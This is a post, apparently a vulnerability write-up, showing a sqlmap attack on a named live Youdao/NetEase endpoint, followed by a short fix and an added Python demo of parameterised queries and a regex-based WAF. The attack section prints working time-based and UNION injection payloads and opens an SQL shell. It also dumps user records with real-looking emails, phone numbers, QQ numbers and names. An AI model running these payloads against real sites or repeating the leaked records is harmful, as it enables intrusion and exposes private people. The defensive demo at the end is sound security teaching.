SQL injection on a NetEase site affects the information of a million users

  • 2022-04-07 19:34:30
$ python sqlmap.py -u "https://f.youdao.com/file.do?method=getMajorName&subject=undefined*" --sql-shell
         _
 ___ ___| |_____ ___ ___  {1.0.3.9#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:19:31

custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[12:19:33] [INFO] resuming back-end DBMS 'mysql'
[12:19:33] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: https://f.youdao.com:80/file.do?method=getMajorName&subject=undefined' AND (SELECT * FROM (SELECT(SLEEP(5)))wyCV) AND 'UlJS'='UlJS

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: https://f.youdao.com:80/file.do?method=getMajorName&subject=undefined' UNION ALL SELECT NULL,CONCAT(0x716a766a71,0x686f634c42577a794d7447684b6b796e51566255644e6f58714b6e527568574b4d786f536a50426d,0x7170717a71),NULL,NULL-- -
---
[12:19:33] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[12:19:33] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select count(*) from user_online
[12:20:00] [INFO] fetching SQL SELECT statement query output: 'select count(*) from user_online'
[12:20:00] [WARNING] reflective value(s) found and filtering out
select count(*) from user_online:    '1171117'
sql-shell> select * from user_online limit 10
[12:20:49] [INFO] fetching SQL SELECT statement query output: 'select * from user_online limit 10'
[12:20:49] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
[12:20:49] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[12:20:49] [INFO] fetching current database
[12:20:49] [INFO] fetching columns for table 'user_online' in database 'atranslate'
[12:20:49] [INFO] the query with expanded column name(s) is: SELECT amount, createTime, email, id, info, trialAmount, username FROM user_online LIMIT 10
[12:20:49] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request(s)
[12:20:49] [INFO] retrieved: "0","1421038640911","[email protected]","-9223371666268699366","{\\"phone\\":\\"13849737026\\...
[12:20:49] [INFO] retrieved: "0","1441078075986"," ","-9223365685474998611","{\\"vendor\\":\\"write\\"}","0","kuang.xiaoyan@...
[12:20:50] [INFO] retrieved: "0","1456906495294"," ","-9223339392571530192","{\\"vendor\\":\\"read\\"}","0","[email protected]..
[12:20:50] [INFO] retrieved: "0","1420706540215"," ","-9223331508831089524","{\\"vendor\\":\\"write\\"}","0","[email protected]..
[12:20:50] [INFO] retrieved: "0","1458184084774"," ","-9223323061235546606","{\\"vendor\\":\\"weixinapp\\"}","0","opWGrjrDDK...
[12:20:50] [INFO] retrieved: "0","1422687949837"," ","-9223299177461494054","{\\"vendor\\":\\"write\\"}","0","carrie_chicos@...
[12:20:50] [INFO] retrieved: "0","1433299378884"," ","-9223294631254944376","{\\"vendor\\":\\"write\\"}","0","[email protected]...
[12:20:50] [INFO] retrieved: "0","1433410028488","[email protected]","-9223283068763516084","{\\"phone\\":\\"13924952418\\",\\...
[12:20:50] [INFO] retrieved: "0","1457073582194"," ","-9223281766783387951","{\\"vendor\\":\\"write\\"}","0","[email protected]...
[12:20:50] [INFO] retrieved: "0","1440489549781"," ","-9223261311899849978","{\\"vendor\\":\\"write\\"}","0","[email protected]"
select * from user_online limit 10 [10]:
[*] 0, 1421038640911, [email protected], -9223371666268699366, {\"phone\":\"13849737026\",\"bill\":null,\"nickname\":\"Bonnie\",\"vendor\":\"fanyiinput\",\"name\":\"陈秀\",\"qq\":\"792684076\"}, 0, qq_F516AC4A2C032277B0BECE2E5FA8EEF0
[*] 0, 1441078075986,  , -9223365685474998611, {\"vendor\":\"write\"}, 0, [email protected]
[*] 0, 1456906495294,  , -9223339392571530192, {\"vendor\":\"read\"}, 0, [email protected]
[*] 0, 1420706540215,  , -9223331508831089524, {\"vendor\":\"write\"}, 0, [email protected]
[*] 0, 1458184084774,  , -9223323061235546606, {\"vendor\":\"weixinapp\"}, 0, opWGrjrDDKLQ7kKG4-4KGEBlKsYs
[*] 0, 1422687949837,  , -9223299177461494054, {\"vendor\":\"write\"}, 0, [email protected]
[*] 0, 1433299378884,  , -9223294631254944376, {\"vendor\":\"write\"}, 0, [email protected]
[*] 0, 1433410028488, [email protected], -9223283068763516084, {\"phone\":\"13924952418\",\"nickname\":\"☆心B\\\/tp钟\",\"vendor\":\"connect.qq.com\"}, 0, qq_E58B42699858FC01548B79B25230D4A2
[*] 0, 1457073582194,  , -9223281766783387951, {\"vendor\":\"write\"}, 0, [email protected]
[*] 0, 1440489549781,  , -9223261311899849978, {\"vendor\":\"write\"}, 0, [email protected]

Data on 1171117 users; the number has a nice ring to it.

Solution:

Filter, escape, and add a WAF.
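To make the fix concrete, here is an added example (not code from the write-up or from the affected site) showing the bug class behind the `subject` parameter and the two defensive layers the solution lists. SQLite stands in for the site's MySQL backend, and the `major` table, its four columns and its rows are constructed for the demo; the UNION payload mirrors the four-column shape sqlmap reported, and the time-based payload is the one printed in the session above, used here only as input to the detector. The function and table names are assumptions.

```python
import re
import sqlite3

# Constructed stand-in for the backend: an in-memory SQLite table with four
# columns, matching the "4 columns" sqlmap found. Nothing here is real site data.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE major (id INTEGER, name TEXT, subject TEXT, extra TEXT)")
    conn.executemany(
        "INSERT INTO major VALUES (?, ?, ?, ?)",
        [(1, "Computer Science", "engineering", ""), (2, "Linguistics", "humanities", "")],
    )
    return conn

# The bug class from the write-up: the request parameter is pasted into the SQL
# text, so a quote in the value ends the string and the rest becomes SQL.
def get_major_name_vulnerable(conn, subject):
    sql = "SELECT id, name, subject, extra FROM major WHERE subject = '" + subject + "'"
    return conn.execute(sql).fetchall()

# The fix: bind the value as a parameter. The driver ships it as data, so the
# query structure cannot change no matter what the value contains.
def get_major_name_safe(conn, subject):
    sql = "SELECT id, name, subject, extra FROM major WHERE subject = ?"
    return conn.execute(sql, (subject,)).fetchall()

# Same four-column UNION shape sqlmap used against the site, with a marker
# string in the second column instead of sqlmap's CONCAT of hex markers.
UNION_PAYLOAD = "undefined' UNION ALL SELECT NULL,'injected',NULL,NULL-- -"

# The time-based blind payload exactly as printed in the sqlmap session above.
TIME_PAYLOAD = "undefined' AND (SELECT * FROM (SELECT(SLEEP(5)))wyCV) AND 'UlJS'='UlJS"

# WAF-style backstop: flag the constructs both payloads rely on. This catches
# the obvious cases and is a detection aid, not a substitute for binding.
INJECTION_PATTERNS = [
    re.compile(r"\bUNION\b\s+(ALL\s+)?SELECT\b", re.IGNORECASE),   # UNION-based extraction
    re.compile(r"\bSLEEP\s*\(", re.IGNORECASE),                    # MySQL time-based blind
    re.compile(r"--[\s-]"),                                        # trailing SQL comment
    re.compile(r"'\s*(AND|OR)\s+\(?\s*SELECT\b", re.IGNORECASE),   # quote-break into a subquery
]

def looks_like_injection(value):
    return any(p.search(value) for p in INJECTION_PATTERNS)

def demo():
    # Returns what each layer does with a benign value and with the UNION payload.
    return {
        "vulnerable_benign": get_major_name_vulnerable(make_db(), "engineering"),
        "vulnerable_payload": get_major_name_vulnerable(make_db(), UNION_PAYLOAD),
        "safe_benign": get_major_name_safe(make_db(), "engineering"),
        "safe_payload": get_major_name_safe(make_db(), UNION_PAYLOAD),
        "waf_flags_union": looks_like_injection(UNION_PAYLOAD),
        "waf_flags_time": looks_like_injection(TIME_PAYLOAD),
        "waf_flags_benign": looks_like_injection("engineering"),
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

With string concatenation the UNION payload produces a row that was never in the table, which is the mechanism sqlmap used to read `user_online`; with a bound parameter the same value is just a subject name that matches nothing. Of the three items in the solution, binding removes the bug, while filtering and a WAF only narrow the inputs that reach it; escaping alone is character-set and context dependent, so it should be treated as a second line, not the primary fix.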
